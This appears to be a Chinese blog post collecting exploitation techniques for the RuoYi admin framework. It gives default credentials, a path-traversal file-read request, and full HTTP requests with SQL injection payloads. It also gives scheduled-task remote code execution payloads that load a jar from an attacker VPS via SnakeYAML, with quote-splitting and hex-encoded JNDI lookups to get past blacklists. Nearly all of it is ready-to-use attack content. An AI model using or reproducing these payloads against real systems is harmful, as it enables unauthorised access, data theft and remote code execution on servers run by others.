ruoyi漏洞利用
1、ruoyi默认口令
admin/admin123
ruoyi/123456
2、前端shiro反序列化
版本过低,基本不能利用,使用反序列化工具不再过多介绍。
3、任意文件读取 Ruoyi <4.5.1
1 | GET /common/download/resource?resource=/profile/../../../../../../../{filename} |
4、SQL注入
4-1、/system/role/list路径
post型
POST /system/role/list HTTP/1.1 Host: 127.0.0.1 User-Age nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 181 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/system/role Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
GET型
GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms%5BbeginTime%5D=¶ms%5BendTime%5D=¶ms%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e)) HTTP/1.1 Host: 127.0.0.1 User-Age nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 181 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/system/role Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
4-2、/system/dept/list路径
POST /system/dept/list HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie:
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Length: 0
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
5、定时任务
5-1、无限制定时任务利用
在vps配置好exp之后,在定时任务处新建定时任务
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps地址/yaml-payload.jar"]]]]')
0/10 * * * * ?
5-2、黑名单限制了调用字符串
定时任务屏蔽ldap远程调用
定时任务屏蔽http(s)远程调用
定时任务屏蔽rmi远程调用
org.yaml.snakeyaml.Yaml.load(‘!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [“h’t’t’p’://vps地址/yaml-payload.jar”]]]]’)
0/10 * * * * ?
5-3、调用类白名单限制
利用 genTableServiceImpl.createTable
方法来修改invoke_target为Jndi payload。
漏洞利用方式:
新建定时任务:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')
0/10 * * * * ?
此时若job_id为1的任务“调用目标字符串”为NILF,则说明漏洞存在,则进一步利用。 实际攻击payload为:
genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")
但是一般会禁用jndi,对value(javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn'))转换为16进制绕过黑名单限制。 最终payload为:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!